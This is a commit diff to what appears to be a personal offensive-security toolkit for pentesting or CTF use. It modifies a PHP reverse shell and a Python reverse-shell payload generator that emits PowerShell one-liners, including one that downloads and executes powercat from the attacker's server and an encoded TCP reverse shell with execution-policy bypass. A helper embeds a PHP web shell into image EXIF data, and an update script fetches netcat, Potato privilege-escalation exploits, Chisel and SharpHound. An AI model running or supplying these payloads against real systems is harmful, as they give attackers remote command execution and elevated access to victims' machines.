This commit is contained in:
Roman Hergenreder 2023-11-26 14:10:54 +01:00
parent 309b27e330
commit 17455af5f2
10 changed files with 206 additions and 177 deletions

@ -23,7 +23,7 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
def do_POST(self): def do_POST(self):
self.do_GET() self.do_GET()
def onForward(self, base_path, target): def onForward(self, base_path, target, **kwargs):
path = self.path[max(0, len(base_path)-1):] path = self.path[max(0, len(base_path)-1):]
parts = urlparse(target) parts = urlparse(target)
if path.startswith(parts.path): if path.startswith(parts.path):
@ -47,7 +47,7 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
method = self.command method = self.command
print(target, "=>", method, target_rewrite) print(target, "=>", method, target_rewrite)
res = requests.request(method, target_rewrite, headers=self.headers, data=data) res = requests.request(method, target_rewrite, headers=self.headers, data=data, **kwargs)
return res.status_code, res.content, res.headers return res.status_code, res.content, res.headers
def read_body(self): def read_body(self):
@ -212,8 +212,8 @@ class HttpFileServer(HTTPServer):
def addPrefixRoute(self, path, func): def addPrefixRoute(self, path, func):
self.prefix_routes[self.cleanPath(path)] = func self.prefix_routes[self.cleanPath(path)] = func
def forwardRequest(self, path, target): def forwardRequest(self, path, target, **kwargs):
self.addPrefixRoute(path, lambda req: req.onForward(path, target)) self.addPrefixRoute(path, lambda req: req.onForward(path, target, **kwargs))
def enableLogging(self): def enableLogging(self):
self.logRequests = True self.logRequests = True

File diff suppressed because one or more lines are too long

@ -51,7 +51,7 @@ $port = intval($_GET["LPORT"]);
$chunk_size = 1400; $chunk_size = 1400;
$write_a = null; $write_a = null;
$error_a = null; $error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i'; $shell = $_GET["SHELL"] ?? 'uname -a; w; id; /bin/sh -i';
$daemon = 0; $daemon = 0;
$debug = 0; $debug = 0;

@ -14,6 +14,7 @@ import paramiko
import readline import readline
import base64 import base64
import select import select
import pwnlib
try: try:
@ -178,7 +179,11 @@ class ShellListener:
return output return output
def print_message(self, data): def print_message(self, data):
sys.stdout.write(data.decode()) try:
data = data.decode()
except:
data = str(data) # workaround so the shell doesn't die
sys.stdout.write(data)
sys.stdout.flush() sys.stdout.flush()
def interactive(self): def interactive(self):
@ -394,11 +399,19 @@ def generate_payload(payload_type, local_address, port, index=None, **kwargs):
payload = f"xterm -display {local_address}:1" payload = f"xterm -display {local_address}:1"
elif payload_type == "powercat": elif payload_type == "powercat":
shell = kwargs.get("shell", "cmd") shell = kwargs.get("shell", "cmd")
return f"powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://{local_address}/powercat.ps1');powercat -c {local_address} -p {port} -e {shell}\"" http_port = kwargs.get("http_port", 80)
return f"powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://{local_address}:{http_port}/powercat.ps1');powercat -c {local_address} -p {port} -e {shell}\""
elif payload_type == "powershell": elif payload_type == "powershell":
payload = '$a=New-Object System.Net.Sockets.TCPClient("%s",%d);$d=$a.GetStream();[byte[]]$k=0..65535|%%{0};while(($i=$d.Read($k,0,$k.Length)) -ne 0){;$o=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($k,0,$i);$q=(iex $o 2>&1|Out-String);$c=$q+"$ ";$b=([text.encoding]::ASCII).GetBytes($c);$d.Write($b,0,$b.Length);$d.Flush()};$a.Close();' % (local_address, port) payload = '$a=New-Object System.Net.Sockets.TCPClient("%s",%d);$d=$a.GetStream();[byte[]]$k=0..65535|%%{0};while(($i=$d.Read($k,0,$k.Length)) -ne 0){;$o=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($k,0,$i);$q=(iex $o 2>&1|Out-String);$c=$q+"$ ";$b=([text.encoding]::ASCII).GetBytes($c);$d.Write($b,0,$b.Length);$d.Flush()};$a.Close();' % (local_address, port)
payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode() if kwargs.get("method", "process") == "process":
payload = f"powershell.exe -exec bypass -enc {payload_encoded}" payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode()
execution_policy = kwargs.get("execution_policy", "bypass")
flags = ["-EncodedCommand", payload_encoded]
if execution_policy is not None:
flags.append("-ExecutionPolicy")
flags.append(execution_policy)
flags = " ".join(flags)
payload = f"powershell.exe {flags}"
else: else:
payload = None payload = None
print("[-] Unknown payload type:", payload_type) print("[-] Unknown payload type:", payload_type)

@ -13,7 +13,8 @@ def generate_template(base_url, features):
proxy = "" proxy = ""
variables = { variables = {
"BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"' "BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"',
"IP_ADDRESS": "util.get_address()",
} }
request_method = f"""def request(method, uri, **kwargs): request_method = f"""def request(method, uri, **kwargs):
@ -84,7 +85,8 @@ import requests
import subprocess import subprocess
import urllib.parse import urllib.parse
from bs4 import BeautifulSoup from bs4 import BeautifulSoup
from hackingscripts import util, fileserver, rev_shell from hackingscripts import util, rev_shell
from hackingscripts.fileserver import HttpFileServer
from urllib3.exceptions import InsecureRequestWarning from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

@ -64,7 +64,7 @@ fi
echo "Updating Chisel…" echo "Updating Chisel…"
chisel_version=$(get_latest_version jpillora/chisel v) chisel_version=$(get_latest_version jpillora/chisel v)
if [ ! -z "$peas_version" ]; then if [ ! -z "$chisel_version" ]; then
echo "Got Chisel version: $chisel_version" echo "Got Chisel version: $chisel_version"
curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_386.gz" | gzip -d > chisel curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_386.gz" | gzip -d > chisel
curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_amd64.gz" | gzip -d > chisel64 curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_amd64.gz" | gzip -d > chisel64
@ -78,8 +78,15 @@ fi
echo "Updating windows tools…" echo "Updating windows tools…"
download https://live.sysinternals.com/accesschk.exe win/accesschk.exe download https://live.sysinternals.com/accesschk.exe win/accesschk.exe
download https://live.sysinternals.com/accesschk64.exe win/accesschk64.exe download https://live.sysinternals.com/accesschk64.exe win/accesschk64.exe
download https://github.com/int0x33/nc.exe/raw/master/nc.exe win/nc.exe
download https://github.com/int0x33/nc.exe/raw/master/nc64.exe win/nc64.exe
download https://github.com/k4sth4/Juicy-Potato/raw/main/x86/jp32.exe win/JuicyPotato.exe download https://github.com/k4sth4/Juicy-Potato/raw/main/x86/jp32.exe win/JuicyPotato.exe
download https://github.com/k4sth4/Juicy-Potato/raw/main/x64/jp.exe win/JuicyPotato64.exe download https://github.com/k4sth4/Juicy-Potato/raw/main/x64/jp.exe win/JuicyPotato64.exe
download https://github.com/uknowsec/SweetPotato/raw/master/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe win/SweetPotato.exe download https://github.com/uknowsec/SweetPotato/raw/master/SweetPotato-Webshell-new/bin/Release/SweetPotato.exe win/SweetPotato.exe
download https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe win/GodPotato.exe download https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe win/GodPotato.exe
download_zip https://github.com/BloodHoundAD/SharpHound/releases/download/v2.0.1/SharpHound-v2.0.1.zip win/ SharpHound.exe SharpHound.ps1
sharphound_version=$(get_latest_version BloodHoundAD/SharpHound v)
if [ ! -z "$sharphound_version" ]; then
echo "Got Chisel version: $sharphound_version"
download_zip https://github.com/BloodHoundAD/SharpHound/releases/download/v${sharphound_version}/SharpHound-v${sharphound_version}.zip win/ SharpHound.exe SharpHound.ps1
fi

13
util.py

@ -346,13 +346,20 @@ def base64urldecode(data):
data = urllib.parse.unquote(data) data = urllib.parse.unquote(data)
data = data.encode() data = data.encode()
return base64.urlsafe_b64decode(data + b'=' * (4 - len(data) % 4)) if len(data) % 4 > 0:
data += b'=' * (4 - len(data) % 4)
def base64urlencode(data): return base64.urlsafe_b64decode(data)
def base64urlencode(data, strip_padding=True):
if isinstance(data, str): if isinstance(data, str):
data = data.encode() data = data.encode()
return base64.urlsafe_b64encode(data) encoded = base64.urlsafe_b64encode(data)
if strip_padding:
encoded = encoded.rstrip(b"=")
return encoded
def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None, _format=None): def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_tag=None, _format=None):
import exif import exif

Binary file not shown.

Binary file not shown.

Binary file not shown.